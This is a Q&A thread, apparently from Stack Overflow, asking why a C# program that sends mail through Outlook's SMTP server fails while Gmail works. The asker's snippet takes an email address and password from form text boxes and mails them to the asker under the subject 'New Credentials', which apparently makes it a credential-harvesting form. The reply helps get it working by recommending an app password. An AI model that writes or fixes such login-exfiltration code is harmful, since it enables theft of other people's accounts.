# SMTP server for gmail works, but for outlook it just freeze and it doesnt work

Tags: c#, email, server, outlook, smtp

For some reason, GMAIL *works*, BUT outlook kinda don't wanna work with me, idk why tho :/ But GMAIL SMTP works, I tried more SMTPS for outlook but it still doesn't work for some reason. I tried this for GMAIL as well, no problem, but outlook making problems... I used different ports too but for OUTLOOK its port 587.

> I think SMTP is bad, but for GMAIL SMTP works

```cs
MailMessage msg = new MailMessage();
msg.From = new MailAddress("email@outlook.com", "pass");
msg.To.Add(new MailAddress("email@outlook.com"));
msg.Subject = "New Credentials";
msg.Body = "Email: " + textBox1 + "password: " + textBox2;
SmtpClient smtp = new SmtpClient();
smtp.Host = "smtp.office365.com";
smtp.Port = 587;
smtp.Credentials = new NetworkCredential("email@outlook.com", "password");
smtp.EnableSsl = true;
smtp.Send(msg);
MessageBox.Show("Email sent");
```

1. SMTP is **bad** idk why
2. Any ideas

Answer (score 0):

I cannot see a problem in your snippet (url and port ok, SSL enabled), but in case you activated 2-factor-authentification you cannot use your "normal" password.

You need to set a app-password and use this one for your app.

You can set a app password here: https://account.live.com/proofs/AppPassword

Hope this is solving your problem.